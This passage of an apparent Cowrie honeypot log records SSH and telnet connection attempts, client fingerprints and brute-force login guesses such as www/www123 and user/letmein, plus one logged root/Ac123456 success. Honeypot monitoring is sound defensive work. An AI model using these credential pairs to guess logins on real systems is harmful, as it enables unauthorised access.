521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T06:55:39.582623Z","src_ip":"104.234.115.76","session":"a53305857795"}
{"eventid":"cowrie.session.closed","duration":"14.3","message":"Connection lost after 14.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:55:53.580596Z","src_ip":"104.234.115.76","session":"a53305857795"}
{"eventid":"cowrie.login.failed","username":"www","password":"www123","message":"login attempt [www/www123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:55:54.196322Z","src_ip":"212.227.125.160","session":"33ee8443a979"}
{"eventid":"cowrie.session.closed","duration":"36.0","message":"Connection lost after 36.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:55:59.069873Z","src_ip":"212.227.125.160","session":"33ee8443a979"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33814,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8ff4fbc6abc","protocol":"ssh","message":"New connection: 212.227.235.229:33814 (1.2.3.4:22) [session: c8ff4fbc6abc]","sensor":"my-vps","timestamp":"2025-08-31T06:56:00.100126Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59292,"dst_ip":"1.2.3.4","dst_port":22,"session":"5703400078d2","protocol":"ssh","message":"New connection: 212.227.235.229:59292 (1.2.3.4:22) [session: 5703400078d2]","sensor":"my-vps","timestamp":"2025-08-31T06:56:07.891506Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42080,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc9194b06a44","protocol":"ssh","message":"New connection: 212.227.125.160:42080 (1.2.3.4:22) [session: fc9194b06a44]","sensor":"my-vps","timestamp":"2025-08-31T06:56:08.456801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:56:08.468001Z","src_ip":"212.227.125.160","session":"fc9194b06a44"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:56:08.618623Z","src_ip":"212.227.235.229","session":"5703400078d2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:56:08.619663Z","src_ip":"212.227.235.229","session":"5703400078d2"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-08-31T06:56:08.712867Z","src_ip":"212.227.125.160","session":"fc9194b06a44"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:56:08.934046Z","src_ip":"212.227.235.229","session":"c8ff4fbc6abc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:56:08.935462Z","src_ip":"212.227.235.229","session":"c8ff4fbc6abc"}
{"eventid":"cowrie.login.failed","username":"user","password":"letmein","message":"login attempt [user/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T06:56:13.775214Z","src_ip":"212.227.235.229","session":"5703400078d2"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:56:15.441031Z","src_ip":"212.227.235.229","session":"5703400078d2"}
{"eventid":"cowrie.session.closed","duration":"15.1","message":"Connection lost after 15.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:56:23.556560Z","src_ip":"212.227.125.160","session":"fc9194b06a44"}
{"eventid":"cowrie.login.failed","username":"www","password":"www123","message":"login attempt [www/www123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:56:25.745045Z","src_ip":"212.227.235.229","session":"c8ff4fbc6abc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51510,"dst_ip":"1.2.3.4","dst_port":22,"session":"946a9ddba201","protocol":"ssh","message":"New connection: 212.227.125.160:51510 (1.2.3.4:22) [session: 946a9ddba201]","sensor":"my-vps","timestamp":"2025-08-31T06:56:28.180073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:56:28.755659Z","src_ip":"212.227.125.160","session":"946a9ddba201"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:56:28.756429Z","src_ip":"212.227.125.160","session":"946a9ddba201"}
{"eventid":"cowrie.session.closed","duration":"29.5","message":"Connection lost after 29.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:56:29.582611Z","src_ip":"212.227.235.229","session":"c8ff4fbc6abc"}
{"eventid":"cowrie.login.failed","username":"user","password":"letmein","message":"login attempt [user/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T06:56:31.226798Z","src_ip":"212.227.125.160","session":"946a9ddba201"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52368,"dst_ip":"1.2.3.4","dst_port":22,"session":"70004e68a872","protocol":"ssh","message":"New connection: 212.227.125.160:52368 (1.2.3.4:22) [session: 70004e68a872]","sensor":"my-vps","timestamp":"2025-08-31T06:56:31.275839Z"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:56:32.699679Z","src_ip":"212.227.125.160","session":"946a9ddba201"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:56:38.505008Z","src_ip":"212.227.125.160","session":"70004e68a872"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:56:38.505836Z","src_ip":"212.227.125.160","session":"70004e68a872"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55054,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8e00023684c","protocol":"ssh","message":"New connection: 212.227.235.229:55054 (1.2.3.4:22) [session: c8e00023684c]","sensor":"my-vps","timestamp":"2025-08-31T06:56:45.680664Z"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.167.72","src_port":6100,"dst_ip":"1.2.3.4","dst_port":22,"session":"66dc92c7e937","protocol":"ssh","message":"New connection: 170.64.167.72:6100 (1.2.3.4:22) [session: 66dc92c7e937]","sensor":"my-vps","timestamp":"2025-08-31T06:56:49.994366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-31T06:56:50.300758Z","src_ip":"170.64.167.72","session":"66dc92c7e937"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-31T06:56:50.584533Z","src_ip":"170.64.167.72","session":"66dc92c7e937"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-31T06:56:53.611865Z","src_ip":"170.64.167.72","session":"66dc92c7e937"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:56:53.613322Z","src_ip":"170.64.167.72","session":"66dc92c7e937"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39966,"dst_ip":"1.2.3.4","dst_port":22,"session":"f175e3de037d","protocol":"ssh","message":"New connection: 212.227.235.229:39966 (1.2.3.4:22) [session: f175e3de037d]","sensor":"my-vps","timestamp":"2025-08-31T06:57:05.840616Z"}
{"eventid":"cowrie.session.closed","duration":"20.8","message":"Connection lost after 20.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:57:06.504665Z","src_ip":"212.227.235.229","session":"c8e00023684c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:57:06.599636Z","src_ip":"212.227.235.229","session":"f175e3de037d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:57:06.600302Z","src_ip":"212.227.235.229","session":"f175e3de037d"}
{"eventid":"cowrie.login.failed","username":"user","password":"welcome","message":"login attempt [user/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T06:57:12.601286Z","src_ip":"212.227.235.229","session":"f175e3de037d"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:57:14.358055Z","src_ip":"212.227.235.229","session":"f175e3de037d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36374,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb6ab49cca30","protocol":"ssh","message":"New connection: 212.227.125.160:36374 (1.2.3.4:22) [session: bb6ab49cca30]","sensor":"my-vps","timestamp":"2025-08-31T06:57:26.209862Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:57:26.597307Z","src_ip":"212.227.125.160","session":"70004e68a872"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58398,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0b39e915fb5","protocol":"ssh","message":"New connection: 212.227.125.160:58398 (1.2.3.4:22) [session: e0b39e915fb5]","sensor":"my-vps","timestamp":"2025-08-31T06:57:27.060507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:57:27.540550Z","src_ip":"212.227.125.160","session":"e0b39e915fb5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:57:27.541551Z","src_ip":"212.227.125.160","session":"e0b39e915fb5"}
{"eventid":"cowrie.login.failed","username":"user","password":"welcome","message":"login attempt [user/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T06:57:29.513443Z","src_ip":"212.227.125.160","session":"e0b39e915fb5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57368,"dst_ip":"1.2.3.4","dst_port":22,"session":"22d2e1d42676","protocol":"ssh","message":"New connection: 217.72.205.35:57368 (1.2.3.4:22) [session: 22d2e1d42676]","sensor":"my-vps","timestamp":"2025-08-31T06:57:30.879620Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:57:30.881631Z","src_ip":"217.72.205.35","session":"22d2e1d42676"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:57:30.969116Z","src_ip":"212.227.125.160","session":"e0b39e915fb5"}
{"eventid":"cowrie.session.closed","duration":"27.1","message":"Connection lost after 27.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:57:53.306262Z","src_ip":"212.227.125.160","session":"bb6ab49cca30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55169,"dst_ip":"1.2.3.4","dst_port":23,"session":"5f96b6d0d757","protocol":"telnet","message":"New connection: 212.227.125.160:55169 (1.2.3.4:23) [session: 5f96b6d0d757]","sensor":"my-vps","timestamp":"2025-08-31T06:57:55.655582Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62072,"dst_ip":"1.2.3.4","dst_port":22,"session":"a984a18b5cb9","protocol":"ssh","message":"New connection: 212.227.125.160:62072 (1.2.3.4:22) [session: a984a18b5cb9]","sensor":"my-vps","timestamp":"2025-08-31T06:57:55.708033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T06:57:55.708683Z","src_ip":"212.227.125.160","session":"a984a18b5cb9"}
